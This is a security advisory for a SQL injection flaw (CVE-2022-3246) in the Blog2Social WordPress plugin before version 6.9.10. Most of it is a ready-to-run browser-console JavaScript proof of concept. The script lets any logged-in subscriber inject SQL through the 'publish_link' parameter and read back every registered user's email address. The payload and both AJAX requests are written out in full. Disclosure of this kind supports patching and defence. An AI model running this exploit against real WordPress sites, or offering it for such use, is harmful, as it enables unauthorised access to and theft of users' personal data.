Blog2Social < 6.9.10 – Subscriber+ SQLi | CVE 2022-3246

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated users, such as subscribers

Proof of Concept

Run the script below in the web browser console while being logged in as a subscriber and on the Blog2Social Dashboard page (wp-admin/admin.php?page=blog2social) to get all registered user emails via the SQL Injection

// There need to be at least one post in the wp_b2s_posts table (if the table is empty, can simply create a dummy one directly in the DB)
// The b2s_post_id variable below needs to be one from the wp_b2s_posts table
// The current_user_id does not need to be the owner of the post

// Change ME!
current_user_id = 21;
wp_site_ajax_url = 'https://example.com/wp-admin/admin-ajax.php';
b2s_post_id = 1;

// Don't edit below

// First request to read data from any SQL table as a subquery and write to wp_b2s_posts
data1 = new FormData();
data1.append('action', 'b2s_update_approve_post');
data1.append('post_id', b2s_post_id);
data1.append('publish_link', "',publish_link=(SELECT/**/CONCAT('DATA_KEY=',group_concat(user_email/**/separator/**/';'))/**/FROM/**/wp_users),publish_error_code='',post_id=1337,blog_user_id=" + current_user_id + "/**/WHERE/**/id=1#");
data1.append('publish_error_code', '');
data1.append('b2s_security_nonce', jQuery('#b2s_security_nonce').val());

fetch(wp_site_ajax_url, {
    method: "POST",
    credentials: 'same-origin',
    body: data1
});

// Second request to fetch the data from wp_b2s_posts
data2 = new FormData();

data2.append('action', 'b2s_publish_post_data');
data2.append('postId', 1337);
data2.append('b2s_security_nonce', jQuery('#b2s_security_nonce').val());

fetch(wp_site_ajax_url, {
    method: "POST",
    credentials: 'same-origin',
    body: data2
}).then(response => response.json())
    .then(data => {
        const found = data.content.match(/DATA_KEY=[^>]*>/g);
        console.log(found);
    });